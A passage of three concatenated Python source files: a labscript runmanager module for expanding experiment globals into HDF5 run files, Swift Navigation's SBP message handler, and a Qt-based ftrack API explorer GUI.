message += '%s: %s: %s\n' % (global_name, exception.__class__.__name__, exception.message if PY2 else str(exception))
raise Exception(message)
else:
for global_name, exception in errors:
evaled_globals[global_name] = exception
break
previous_errors = len(errors)
# Assemble results into a dictionary of the same format as sequence_globals:
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
# Do not attempt to override exception objects already stored
# as the result of multiply defined globals:
if not global_name in results[group_name]:
results[group_name][global_name] = evaled_globals[global_name]
return results, global_hierarchy, expansions
def expand_globals(sequence_globals, evaled_globals, expansion_config = None, return_dimensions = False):
"""Expands iterable globals according to their expansion
settings. Creates a number of 'axes' which are to be outer product'ed
together. Some of these axes have only one element, these are globals
that do not vary. Some have a set of globals being zipped together,
iterating in lock-step. Others contain a single global varying
across its values (the globals set to 'outer' expansion). Returns
a list of shots, each element of which is a dictionary for that
shot's globals."""
if expansion_config is None:
order = {}
shuffle = {}
else:
order = {k:v['order'] for k,v in expansion_config.items() if 'order' in v}
shuffle = {k:v['shuffle'] for k,v in expansion_config.items() if 'shuffle' in v}
values = {}
expansions = {}
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
expression, units, expansion = sequence_globals[group_name][global_name]
value = evaled_globals[group_name][global_name]
values[global_name] = value
expansions[global_name] = expansion
# Get a list of the zip keys in use:
zip_keys = set(expansions.values())
try:
zip_keys.remove('outer')
except KeyError:
pass
axes = {}
global_names = {}
dimensions = {}
for zip_key in zip_keys:
axis = []
zip_global_names = []
for global_name in expansions:
if expansions[global_name] == zip_key:
value = values[global_name]
if not zip_key:
# Wrap up non-iterating globals (with zip_key = '') in a
# one-element list. When zipped and then outer product'ed,
# this will give us the result we want:
value = [value]
axis.append(value)
zip_global_names.append(global_name)
axis = list(zip(*axis))
dimensions['zip '+zip_key] = len(axis)
axes['zip '+zip_key] = axis
global_names['zip '+zip_key] = zip_global_names
# Give each global being outer-product'ed its own axis. It gets
# wrapped up in a list and zipped with itself so that it is in the
# same format as the zipped globals, ready for outer-producting
# together:
for global_name in expansions:
if expansions[global_name] == 'outer':
value = values[global_name]
axis = [value]
axis = list(zip(*axis))
dimensions['outer '+global_name] = len(axis)
axes['outer '+global_name] = axis
global_names['outer '+global_name] = [global_name]
# add any missing items to order and dimensions
for key, value in axes.items():
if key not in order:
order[key] = -1
if key not in shuffle:
shuffle[key] = False
if key not in dimensions:
dimensions[key] = 1
# shuffle relevant axes
for axis_name, axis_values in axes.items():
if shuffle[axis_name]:
random.shuffle(axis_values)
# sort axes and global names by order
axes = [axes.get(key) for key in sorted(order, key=order.get)]
global_names = [global_names.get(key) for key in sorted(order, key=order.get)]
# flatten the global names
global_names = [global_name for global_list in global_names for global_name in global_list]
shots = []
for axis_values in itertools.product(*axes):
# values here is a tuple of tuples, with the outer list being over
# the axes. We need to flatten it to get our individual values out
# for each global, since we no longer care what axis they are on:
global_values = [value for axis in axis_values for value in axis]
shot_globals = dict(zip(global_names, global_values))
shots.append(shot_globals)
if return_dimensions:
return shots, dimensions
else:
return shots
def generate_sequence_id(scriptname):
"""Our convention for generating sequence ids. Just a timestamp and
the name of the labscript that the run file is to be compiled with."""
timestamp = time.strftime('%Y%m%dT%H%M%S', time.localtime())
scriptbase = os.path.basename(scriptname).split('.py')[0]
return timestamp + '_' + scriptbase
def make_run_files(output_folder, sequence_globals, shots, sequence_id, shuffle=False):
"""Does what it says. sequence_globals and shots are of the datatypes
returned by get_globals and get_shots, one is a nested dictionary with
string values, and the other a flat dictionary. sequence_id should
be some identifier unique to this sequence, use generate_sequence_id
to follow convention. shuffle will randomise the order that the run
files are generated in with respect to which element of shots they
come from. This function returns a *generator*. The run files are
not actually created until you loop over this generator (which gives
you the filepaths). This is useful for not having to clean up as many
unused files in the event of failed compilation of labscripts. If you
want all the run files to be created at some point, simply convert
the returned generator to a list. The filenames the run files are
given is simply the sequence_id with increasing integers appended."""
basename = os.path.join(output_folder, sequence_id)
nruns = len(shots)
ndigits = int(np.ceil(np.log10(nruns)))
if shuffle:
random.shuffle(shots)
for i, shot_globals in enumerate(shots):
runfilename = ('%s_%0' + str(ndigits) + 'd.h5') % (basename, i)
make_single_run_file(runfilename, sequence_globals, shot_globals, sequence_id, i, nruns)
yield runfilename
def make_single_run_file(filename, sequenceglobals, runglobals, sequence_id, run_no, n_runs):
"""Does what it says. runglobals is a dict of this run's globals,
the format being the same as that of one element of the list returned
by expand_globals. sequence_globals is a nested dictionary of the
type returned by get_globals. Every run file needs a sequence ID,
generate one with generate_sequence_id. This doesn't have to match
the filename of the run file you end up using, though is usually does
(exceptions being things like connection tables). run_no and n_runs
must be provided, if this run file is part of a sequence, then they
should reflect how many run files are being generated which share
this sequence_id."""
with h5py.File(filename, 'w') as f:
f.attrs['sequence_id'] = sequence_id
f.attrs['run number'] = run_no
f.attrs['n_runs'] = n_runs
f.create_group('globals')
if sequenceglobals is not None:
for groupname, groupvars in sequenceglobals.items():
group = f['globals'].create_group(groupname)
unitsgroup = group.create_group('units')
expansiongroup = group.create_group('expansion')
for name, (value, units, expansion) in groupvars.items():
group.attrs[name] = value
unitsgroup.attrs[name] = units
expansiongroup.attrs[name] = expansion
for name, value in runglobals.items():
if value is None:
# Store it as a null object reference:
value = h5py.Reference()
try:
f['globals'].attrs[name] = value
except Exception as e:
message = ('Global %s cannot be saved as an hdf5 attribute. ' % name +
'Globals can only have relatively simple datatypes, with no nested structures. ' +
'Original error was:\n' +
'%s: %s' % (e.__class__.__name__, e.message if PY2 else str(e)))
raise ValueError(message)
def make_run_file_from_globals_files(labscript_file, globals_files, output_path):
"""Creates a run file output_path, using all the globals from
globals_files. Uses labscript_file only to generate a sequence ID"""
groups = get_all_groups(globals_files)
sequence_globals = get_globals(groups)
evaled_globals, global_hierarchy, expansions = evaluate_globals(sequence_globals)
shots = expand_globals(sequence_globals, evaled_globals)
if len(shots) > 1:
scanning_globals = []
for global_name in expansions:
if expansions[global_name]:
scanning_globals.append(global_name)
raise ValueError('Cannot compile to a single run file: The following globals are a sequence: ' +
', '.join(scanning_globals))
sequence_id = generate_sequence_id(labscript_file)
make_single_run_file(output_path, sequence_globals, shots[0], sequence_id, 1, 1)
def compile_labscript(labscript_file, run_file):
"""Compiles labscript_file with the run file, returning
the processes return code, stdout and stderr."""
proc = subprocess.Popen([sys.executable, labscript_file, run_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
return proc.returncode, stdout, stderr
def compile_labscript_with_globals_files(labscript_file, globals_files, output_path):
"""Creates a run file output_path, using all the globals from
globals_files. Compiles labscript_file with the run file, returning
the processes return code, stdout and stderr."""
make_run_file_from_globals_files(labscript_file, globals_files, output_path)
returncode, stdout, stderr = compile_labscript(labscript_file, output_path)
return returncode, stdout, stderr
def compile_labscript_async(labscript_file, run_file, stream_port, done_callback):
"""Compiles labscript_file with run_file. This function is designed
to be called in a thread. The stdout and stderr from the compilation
will be shoveled into stream_port via zmq push as it spews forth, and
when compilation is complete, done_callback will be called with a
boolean argument indicating success."""
compiler_path = os.path.join(os.path.dirname(__file__), 'batch_compiler.py')
to_child, from_child, child = zprocess.subprocess_with_queues(compiler_path, stream_port)
to_child.put(['compile', [labscript_file, run_file]])
while True:
signal, data = from_child.get()
if signal == 'done':
success = data
to_child.put(['quit', None])
child.communicate()
done_callback(success)
break
else:
raise RuntimeError((signal, data))
def compile_multishot_async(labscript_file, run_files, stream_port, done_callback):
"""Compiles labscript_file with run_files. This function is designed
to be called in a thread. The stdout and stderr from the compilation
will be shoveled into stream_port via zmq push as it spews forth,
and when each compilation is complete, done_callback will be called
with a boolean argument indicating success. Compilation will stop
after the first failure."""
compiler_path = os.path.join(os.path.dirname(__file__), 'batch_compiler.py')
to_child, from_child, child = zprocess.subprocess_with_queues(compiler_path, stream_port)
try:
for run_file in run_files:
to_child.put(['compile', [labscript_file, run_file]])
while True:
signal, data = from_child.get()
if signal == 'done':
success = data
done_callback(data)
break
if not success:
break
except Exception:
error = traceback.format_exc()
zprocess.zmq_push_multipart(stream_port, data=[b'stderr', error.encode('utf-8')])
to_child.put(['quit', None])
child.communicate()
raise
to_child.put(['quit', None])
child.communicate()
def compile_labscript_with_globals_files_async(labscript_file, globals_files, output_path, stream_port, done_callback):
"""Same as compile_labscript_with_globals_files, except it launches
a thread to do the work and does not return anything. Instead,
stderr and stdout will be put to stream_port via zmq push in
the multipart message format ['stdout','hello, world\n'] etc. When
compilation is finished, the function done_callback will be called
a boolean argument indicating success or failure."""
try:
make_run_file_from_globals_files(labscript_file, globals_files, output_path)
thread = threading.Thread(
target=compile_labscript_async, args=[labscript_file, output_path, stream_port, done_callback])
thread.daemon = True
thread.start()
except Exception:
error = traceback.format_exc()
zprocess.zmq_push_multipart(stream_port, data=[b'stderr', error.encode('utf-8')])
t = threading.Thread(target=done_callback, args=(False,))
t.daemon = True
t.start()
def get_shot_globals(filepath):
"""Returns the evaluated globals for a shot, for use by labscript or lyse.
Simple dictionary access as in dict(h5py.File(filepath).attrs) would be fine
except we want to apply some hacks, so it's best to do that in one place."""
params = {}
with h5py.File(filepath, 'r') as f:
for name, value in f['globals'].attrs.items():
# Convert numpy bools to normal bools:
if isinstance(value, np.bool_):
value = bool(value)
# Convert null HDF references to None:
if isinstance(value, h5py.Reference) and not value:
value = None
# Convert numpy strings to Python ones.
# DEPRECATED, for backward compat with old files.
if isinstance(value, np.str_):
value = str(value)
if isinstance(value, bytes):
value = value.decode()
params[name] = value
return params
def dict_diff(dict1, dict2):
"""Return the difference between two dictionaries as a dictionary of key: [val1, val2] pairs.
Keys unique to either dictionary are included as key: [val1, '-'] or key: ['-', val2]."""
diff_keys = []
common_keys = np.intersect1d(list(dict1.keys()), list(dict2.keys()))
for key in common_keys:
if np.iterable(dict1[key]) or np.iterable(dict2[key]):
if not np.array_equal(dict1[key], dict2[key]):
diff_keys.append(key)
else:
if dict1[key] != dict2[key]:
diff_keys.append(key)
dict1_unique = [key for key in dict1.keys() if key not in common_keys]
dict2_unique = [key for key in dict2.keys() if key not in common_keys]
diff = {}
for key in diff_keys:
diff[key] = [dict1[key], dict2[key]]
for key in dict1_unique:
diff[key] = [dict1[key], '-']
for key in dict2_unique:
diff[key] = ['-', dict2[key]]
return diff
def remove_comments_and_tokenify(line):
"""Removed EOL comments from a line, leaving it otherwise intact,
and returns it. Also returns the raw tokens for the line, allowing
comparisons between lines to be made without being sensitive to
whitespace."""
import tokenize
if PY2:
import StringIO as io
else:
import io
result_expression = ''
result_tokens = []
error_encountered = False
# This never fails because it produces a generator, syntax errors
# come out when looping over it:
tokens = tokenize.generate_tokens(io.StringIO(line).readline)
try:
for token_type, token_value, (_, start), (_, end), _ in tokens:
if token_type == tokenize.COMMENT and not error_encountered:
break
if token_type == tokenize.ERRORTOKEN:
error_encountered = True
result_expression = result_expression.ljust(start)
result_expression += token_value
if token_value:
result_tokens.append(token_value)
except tokenize.TokenError:
# Means EOF was reached without closing brackets or something.
# We don't care, return what we've got.
pass
return result_expression, result_tokens
def flatten_globals(sequence_globals, evaluated=False):
"""Flattens the data structure of the globals. If evaluated=False,
saves only the value expression string of the global, not the
units or expansion."""
flattened_sequence_globals = {}
for globals_group in sequence_globals.values():
for name, value in globals_group.items():
if evaluated:
flattened_sequence_globals[name] = value
else:
value_expression, units, expansion = value
flattened_sequence_globals[name] = value_expression
return flattened_sequence_globals
def globals_diff_groups(active_groups, other_groups, max_cols=1000, return_string=True):
"""Given two sets of globals groups, perform a diff of the raw
and evaluated globals."""
our_sequence_globals = get_globals(active_groups)
other_sequence_globals = get_globals(other_groups)
# evaluate globals
our_evaluated_sequence_globals, _, _ = evaluate_globals(our_sequence_globals, raise_exceptions=False)
other_evaluated_sequence_globals, _, _ = evaluate_globals(other_sequence_globals, raise_exceptions=False)
# flatten globals dictionaries
our_globals = flatten_globals(our_sequence_globals, evaluated=False)
other_globals = flatten_globals(other_sequence_globals, evaluated=False)
our_evaluated_globals = flatten_globals(our_evaluated_sequence_globals, evaluated=True)
other_evaluated_globals = flatten_globals(other_evaluated_sequence_globals, evaluated=True)
# diff the *evaluated* globals
value_differences = dict_diff(other_evaluated_globals, our_evaluated_globals)
# We are interested only in displaying globals where *both* the
# evaluated global *and* its unevaluated expression (ignoring comments
# and whitespace) differ. This will minimise false positives where a
# slight change in an expression still leads to the same value, or
# where an object has a poorly defined equality operator that returns
# False even when the two objects are identical.
filtered_differences = {}
for name, (other_value, our_value) in value_differences.items():
our_expression = our_globals.get(name, '-')
other_expression = other_globals.get(name, '-')
# Strip comments, get tokens so we can diff without being sensitive to comments or whitespace:
our_expression, our_tokens = remove_comments_and_tokenify(our_expression)
other_expression, other_tokens = remove_comments_and_tokenify(other_expression)
if our_tokens != other_tokens:
filtered_differences[name] = [repr(other_value), repr(our_value), other_expression, our_expression]
if filtered_differences:
import pandas as pd
df = pd.DataFrame.from_dict(filtered_differences, 'index')
df = df.sort_index()
df.columns = ['Prev (Eval)', 'Current (Eval)', 'Prev (Raw)', 'Current (Raw)']
df_string = df.to_string(max_cols=max_cols)
payload = df_string + '\n\n'
else:
payload = 'Evaluated globals are identical to those of selected file.\n'
if return_string:
return payload
else:
print(payload)
return df
def globals_diff_shots(file1, file2, max_cols=100):
# Get file's globals groups
active_groups = get_all_groups(file1)
# Get other file's globals groups
other_groups = get_all_groups(file2)
print('Globals diff between:\n%s\n%s\n\n' % (file1, file2))
return globals_diff_groups(active_groups, other_groups, max_cols=max_cols, return_string=False)
|
handler.py
|
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`sbp.client.handler` module contains classes related to
SBP message handling.
"""
import warnings
import collections
import threading
import weakref
import six
from six.moves.queue import Queue
try:
from typing import Optional # noqa
except ImportError:
pass
class Handler(object):
"""
Handler
The :class:`Handler` class provides an interface for connecting handlers
to a driver providing SBP messages. Also provides queued and filtered
iterators for synchronous, blocking use in other threads.
Parameters
----------
source : Iterable of tuple(SBP message, {'time':'ISO 8601 str'})
Stream of SBP messages
autostart : Boolean
If false, start() shall be skipped when entering context scope and it
should be explicitly called by the parent. This will prevent losing
messages in case where receive thread would otherwise be started before
consumers are ready.
"""
def __init__(self, source, autostart=True):
self._autostart = autostart
self._source = source
self._callbacks = collections.defaultdict(set)
self._receive_thread = threading.Thread(
target=self._recv_thread, name="Handler")
self._receive_thread.daemon = True
self._sinks = [] # This is a list of weakrefs to upstream iterators
self._dead = False
self._exception = None
self._write_lock = threading.Lock()
def _recv_thread(self):
"""
Internal thread to iterate over source messages and dispatch callbacks.
"""
def gen_messages():
for msg, metadata in self._source:
if msg.msg_type:
yield (msg, metadata)
messages = gen_messages()
while True:
msg_and_metadata = None
try:
msg_and_metadata = next(messages, None)
except Exception as exc:
self._exception = exc
break
if msg_and_metadata is None:
break
msg, metadata = msg_and_metadata
self._call(msg, **metadata)
# Break any upstream iterators
for sink in self._sinks:
i = sink()
if i is not None:
i.breakiter(self._exception)
self._dead = True
def __enter__(self):
if self._autostart:
self.start()
return self
def __exit__(self, *args):
self.stop()
# This exception is raised when a message is dispatched to a garbage
# collected upstream iterator.
class _DeadCallbackException(Exception):
pass
def filter(self, msg_type=None, maxsize=0):
"""
Get a filtered iterator of messages for synchronous, blocking use in
another thread.
"""
if self._dead:
return iter(())
iterator = Handler._SBPQueueIterator(maxsize)
# We use a weakref so that the iterator may be garbage collected if it's
# consumer no longer has a reference.
ref = weakref.ref(iterator)
self._sinks.append(ref)
def feediter(msg, **metadata):
i = ref()
if i is not None:
i(msg, **metadata)
else:
raise Handler._DeadCallbackException
self.add_callback(feediter, msg_type)
return iterator
def __iter__(self):
"""
Get a queued iterator that will provide the same unfiltered messages
read from the source iterator.
"""
return self.filter()
def _to_iter(self, maybe_iter):
try:
return iter(maybe_iter)
except TypeError:
return None
def add_callback(self, callback, msg_type=None):
"""
Add per message type or global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
"""
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
self._callbacks[msg_type_].add(callback)
else:
self._callbacks[msg_type].add(callback)
def remove_callback(self, callback, msg_type=None):
"""
Remove per message type of global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to remove callback from. Default `None` means global callback.
Iterable type removes the callback from all the message types.
"""
if msg_type is None:
msg_type = self._callbacks.keys()
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
try:
self._callbacks[msg_type_].remove(callback)
except KeyError:
pass
else:
self._callbacks[msg_type].remove(callback)
def _gc_dead_sinks(self):
"""
Remove any dead weakrefs.
"""
deadsinks = []
for i in self._sinks:
if i() is None:
deadsinks.append(i)
for i in deadsinks:
self._sinks.remove(i)
def _get_callbacks(self, msg_type):
"""
Return all callbacks (global and per message type) for a message type.
Parameters
----------
msg_type : int
Message type to return callbacks for.
"""
return self._callbacks[None] | self._callbacks[msg_type]
def _call(self, msg, **metadata):
"""
Process message with all callbacks (global and per message type).
"""
if msg.msg_type:
for callback in self._get_callbacks(msg.msg_type):
try:
callback(msg, **metadata)
except Handler._DeadCallbackException:
# The callback was an upstream iterator that has been garbage
# collected. Remove it from our internal structures.
self.remove_callback(callback)
self._gc_dead_sinks()
except SystemExit:
raise
except:
import traceback
traceback.print_exc()
def start(self):
"""
Start processing SBP messages with handlers.
"""
self._receive_thread.start()
def stop(self):
"""
Stop processing SBP messages.
"""
try:
self._source.breakiter()
self._receive_thread.join(0.1)
except Exception as exc:
warnings.warn("Handler stop error: %s" % (exc,))
def join(self, timeout=None):
self._receive_thread.join(timeout)
def is_alive(self):
"""
Return whether the processes thread is alive.
"""
return self._receive_thread.is_alive()
def wait(self, msg_type, timeout=1.0):
"""
Wait for a SBP message.
Parameters
----------
msg_type : int
SBP message type.
timeout : float
Waiting period
"""
event = threading.Event()
payload = {'data': None}
def cb(sbp_msg, **metadata):
payload['data'] = sbp_msg
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
return payload['data']
def wait_callback(self, callback, msg_type=None, timeout=1.0):
"""
Wait for a SBP message with a callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
timeout : float
Waiting period
"""
event = threading.Event()
def cb(msg, **metadata):
callback(msg, **metadata)
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
def __call__(self, *msgs, **metadata):
"""
Pass messages to the `source` to be consumed. Typically this means
the messages will be framed and transmitted via whatever transport
layer is currently active.
Parameters
----------
msgs : SBP messages
SBP messages to send.
metadata : dict
Metadata for this batch of messages, passed to the `source`.
"""
with self._write_lock:
self._source(*msgs, **metadata)
class _SBPQueueIterator(six.Iterator):
"""
Class for upstream iterators. Implements callable interface for adding
messages into the queue, and iterable interface for getting them out.
"""
def __init__(self, maxsize):
self._queue = Queue(maxsize)
self._broken = False
self._exception = None # type: Optional[Exception]
def __iter__(self):
return self
def __call__(self, msg, **metadata):
self._queue.put((msg, metadata), False)
def breakiter(self, exc=None):
self._broken = True
self._exception = exc
self._queue.put(None, True, 1.0)
def __next__(self):
if self._broken and self._queue.empty():
raise StopIteration
m = self._queue.get(True)
if self._broken and m is None:
if self._exception is not None:
raise self._exception
raise StopIteration
return m
|
ftrack_api_explorer.py
|
import os
import requests
import time
import traceback
import uuid
from collections import defaultdict
from functools import wraps
from getpass import getuser
from threading import Thread
import ftrack_api
from Qt import QtCore, QtGui, QtWidgets
from vfxwindow import VFXWindow
_ID_REMAP = {}
def remapID(entityID):
"""Remap any IDs to avoid exposing them in screenshots."""
try:
uuid.UUID(entityID)
except ValueError:
return entityID
try:
return _ID_REMAP[entityID]
except KeyError:
newID = _ID_REMAP[entityID] = str(uuid.uuid4())
return newID
def errorHandler(func):
"""Catch any exception and emit it as a signal."""
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
try:
error = str(e)
except KeyError:
if not isinstance(e, ftrack_api.exception.ServerError):
raise
error = 'Server reported error: An unknown server error occurred.'
# Handle ftrack server errors
if isinstance(e, ftrack_api.exception.ServerError):
error = error[23:] # Remove "Server reported error"
if 'ftrack-user' in error:
try:
del os.environ['FTRACK_API_USER']
except KeyError:
pass
if 'ftrack-api-key' in error:
try:
del os.environ['FTRACK_API_KEY']
except KeyError:
pass
if isinstance(e, requests.exceptions.ConnectionError):
try:
del os.environ['FTRACK_SERVER']
except KeyError:
pass
# Send the error back to the GUI if possible
try:
self.errorInThread.emit(error, traceback.format_exc())
except RuntimeError:
pass
else:
raise
return wrapper
def deferred(func):
"""Run a function in a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
return wrapper
def entityRepr(entityType, entityID=None, remapIDs=False):
"""Create a correct representation of an entity.
>>> project = session.query('Project').first()
>>> entityRepr(project)
Project(id='12345678')
>>> entityRepr(session.types['Project'], '12345678')
Project(id='12345678')
"""
if entityID is None:
entity, entityType = entityType, type(entityType)
primaryKeys = entityType.primary_key_attributes
if entityID is None:
entityID = [entity[k] for k in primaryKeys]
elif not isinstance(entityID, (list, tuple)):
entityID = [entityID]
# Generate an accurate representation of the entity
if remapIDs:
entityID = map(remapID, entityID)
args = ', '.join(f'{k}={v!r}' for k, v in zip(primaryKeys, entityID))
return f'{entityType.entity_type}({args})'
def isKeyLoaded(entity, key):
"""Determine if an entity has a key loaded."""
attrStorage = getattr(entity, '_ftrack_attribute_storage')
if attrStorage is None or key not in attrStorage:
return False
return attrStorage[key]['remote'] != ftrack_api.symbol.NOT_SET
class BusyProgressBar(QtWidgets.QWidget):
"""Allow text to be displayed on a busy progress bar."""
def __init__(self, parent=None):
super().__init__(parent=parent)
grid = QtWidgets.QGridLayout()
grid.setContentsMargins(0, 0, 0, 0)
self.setLayout(grid)
self._progressBar = QtWidgets.QProgressBar()
self._progressBar.setRange(0, 0)
grid.addWidget(self._progressBar, 0, 0)
self._label = QtWidgets.QLabel('test')
self._label.setAlignment(QtCore.Qt.AlignCenter)
self._label.setStyleSheet('color:black')
grid.addWidget(self._label, 0, 0)
def progressBar(self):
return self._progressBar
def label(self):
return self._label
def setValue(self, value):
self._progressBar.setValue(value)
def setFormat(self, format):
self._label.setText(format)
class Placeholders(object):
"""Fake classes to use as placeholders.
The purpose of this is for the dummy items, so they can be replaced
once the parent item is expanded.
"""
class Collection(object):
pass
class KeyValueMappedCollectionProxy(object):
pass
class EntityCache(object):
"""Cache entity values."""
__slots__ = ('id',)
Cache = defaultdict(dict)
Entities = {}
Types = {}
def __init__(self, entity, remapIDs=False):
self.id = entityRepr(entity, remapIDs=remapIDs)
# Don't overwrite as it'll break if auto-populate is disabled
if self.id not in self.Entities:
self.Entities[self.id] = entity
def __getitem__(self, key):
return self.cache[key]
def __setitem__(self, key, value):
self.cache[key] = value
def __contains__(self, key):
return key in self.cache
@property
def cache(self):
return self.Cache[self.id]
@classmethod
def reset(cls):
"""Remove all cache."""
cls.Cache = defaultdict(dict)
@classmethod
def load(cls, entity, remapIDs=False):
"""Add an entity to cache."""
cache = cls(entity, remapIDs=remapIDs)
attributes = type(entity).attributes
for key in entity.keys():
if not isKeyLoaded(entity, key):
continue
cache[key] = entity[key]
attr = attributes.get(key)
if isinstance(attr, ftrack_api.attribute.ReferenceAttribute):
cls.load(entity[key])
elif isinstance(attr, ftrack_api.attribute.CollectionAttribute):
for child in entity[key]:
cls.load(child)
@classmethod
@errorHandler
def types(cls, session=None):
"""Cache the entity types to avoid opening more sessions."""
if not cls.Types:
print('Loading FTrack entity types...')
if session is not None:
cls.Types = session.types
else:
with ftrack_api.Session() as session:
cls.Types = session.types
return dict(cls.Types)
return dict(cls.Types)
@classmethod
def entity(cls, name):
"""Get an entity from its name or return None."""
return cls.Entities.get(name)
class QueryEdit(QtWidgets.QLineEdit):
"""Add a few features to the line edit widget."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setPlaceholderText('Type custom query here...')
self._completerSet = False
def setupCompleter(self):
if self._completerSet:
return False
completer = QtWidgets.QCompleter()
completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.setCompleter(completer)
model = QtCore.QStringListModel()
completer.setModel(model)
model.setStringList(sorted(EntityCache.types()))
self._completerSet = True
return True
def mousePressEvent(self, event):
super().mousePressEvent(event)
self.setupCompleter()
self.completer().complete()
def keyPressEvent(self, event):
super().keyPressEvent(event)
if self.setupCompleter():
self.completer().complete()
class FTrackExplorer(VFXWindow):
WindowID = 'ftrack-api-explorer'
WindowName = 'FTrack API Explorer'
VisitRole = QtCore.Qt.UserRole
DummyRole = QtCore.Qt.UserRole + 1
EntityPrimaryKeyRole = QtCore.Qt.UserRole + 2
EntityTypeRole = QtCore.Qt.UserRole + 3
EntityKeyRole = QtCore.Qt.UserRole + 4
AutoPopulateRole = QtCore.Qt.UserRole + 5
topLevelEntityAdded = QtCore.Signal()
entityLoading = QtCore.Signal(str, int)
errorInThread = QtCore.Signal(str, str)
def __init__(self, parent=None, **kwargs):
super().__init__(parent=parent, **kwargs)
self.setWindowPalette('Nuke', 12)
# Build menu
options = self.menuBar().addMenu('Options')
self._autoPopulate = QtWidgets.QAction('Enable auto-population')
self._autoPopulate.setCheckable(True)
self._autoPopulate.setChecked(True)
options.addAction(self._autoPopulate)
self._remapIDs = QtWidgets.QAction('Remap ID primary keys')
self._remapIDs.setCheckable(True)
self._remapIDs.setChecked(False)
options.addAction(self._remapIDs)
# Build layout
layout = QtWidgets.QVBoxLayout()
widget = QtWidgets.QWidget()
widget.setLayout(layout)
self.setCentralWidget(widget)
queryLayout = QtWidgets.QHBoxLayout()
layout.addLayout(queryLayout)
queryLabel = QtWidgets.QLabel('Query:')
queryLayout.addWidget(queryLabel)
self._queryText = QueryEdit()
queryLayout.addWidget(self._queryText)
queryFirst = QtWidgets.QPushButton('Get First')
queryLayout.addWidget(queryFirst)
queryAll = QtWidgets.QPushButton('Get All')
queryLayout.addWidget(queryAll)
self._entityData = QtWidgets.QTreeView()
layout.addWidget(self._entityData)
entityDataModel = QtGui.QStandardItemModel()
entityDataModel.setHorizontalHeaderLabels(('Key', 'Value', 'Type'))
self._entityData.setModel(entityDataModel)
self._progressArea = QtWidgets.QVBoxLayout()
self._progressArea.setContentsMargins(0, 0, 0, 0)
layout.addLayout(self._progressArea)
footer = QtWidgets.QHBoxLayout()
layout.addLayout(footer)
footer.addStretch()
clear = QtWidgets.QPushButton('Clear')
footer.addWidget(clear)
footer.addStretch()
# Signals
self._entityData.expanded.connect(self.populateChildren)
clear.clicked.connect(self.clear)
self.topLevelEntityAdded.connect(self.autoResizeColumns)
queryAll.clicked.connect(self.executeAll)
queryFirst.clicked.connect(self.executeFirst)
self._queryCounter = 0
self._entityProgress = {}
self.entityLoading.connect(self.updateEntityProgress)
self.errorInThread.connect(self.errorPopup)
# Cache environment info
# This is so a failed connection can delete a key while still
# remembering the original value
try:
self._ftrack_api_user = os.environ['FTRACK_API_USER']
except KeyError:
self._ftrack_api_user = getuser()
try:
self._ftrack_api_key = os.environ['FTRACK_API_KEY']
except KeyError:
self._ftrack_api_key = ''
try:
self._ftrack_server = os.environ['FTRACK_SERVER']
except KeyError:
self._ftrack_server = 'https://company.ftrackapp.com'
def errorPopup(self, error, exc):
"""Allow error popups to be triggered from threads."""
msg = QtWidgets.QMessageBox(self)
msg.setWindowTitle('Error')
msg.setText(error)
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.setDetailedText(exc)
msg.exec_()
def autoPopulate(self):
"""Determine if auto population is allowed."""
return self._autoPopulate.isChecked()
def remapIDs(self):
"""Determine if remapping IDs is required."""
return self._remapIDs.isChecked()
@QtCore.Slot(str, int)
def updateEntityProgress(self, entity, progress):
# Reuse an existing progress bar
if entity in self._entityProgress:
progressBar = self._entityProgress[entity][0]
# Create a new progress bar
else:
if progress < 0:
progressBar = BusyProgressBar()
else:
progressBar = QtWidgets.QProgressBar()
progressBar.setRange(0, 100)
progressBar.setTextVisible(True)
progressBar.setFormat(f'Loading {entity}...')
self._progressArea.addWidget(progressBar)
self._entityProgress[entity] = [progressBar, progress]
progressBar.setValue(progress)
# Delete a finished progress bar
if progress == 100:
widget = self._entityProgress.pop(entity)[0]
widget.deleteLater()
else:
self._entityProgress[entity][1] = progress
@deferred
@errorHandler
def executeAll(self):
"""Get all the results of the query."""
query = self._queryText.text()
if not query:
return
self.checkCredentials()
print(f'Executing {query!r}...')
self._queryCounter += 1
progressName = f'query {self._queryCounter} ({query})'
self.entityLoading.emit(progressName, -1)
with ftrack_api.Session() as session:
try:
for entity in session.query(query):
self._loadEntity(entity)
time.sleep(0.01) # Avoid blocking GUI updates
except (KeyError, ftrack_api.exception.ServerError):
print(f'Invalid query: {query!r}')
self.entityLoading.emit(progressName, 100)
@deferred
@errorHandler
def executeFirst(self):
"""Get the first result of the query."""
query = self._queryText.text()
if not query:
return
self.checkCredentials()
print(f'Executing {query!r}...')
self._queryCounter += 1
progressName = f'query {self._queryCounter}: ({query})'
self.entityLoading.emit(progressName, 0)
with ftrack_api.Session() as session:
try:
entity = session.query(query).first()
except (KeyError, ftrack_api.exception.ServerError):
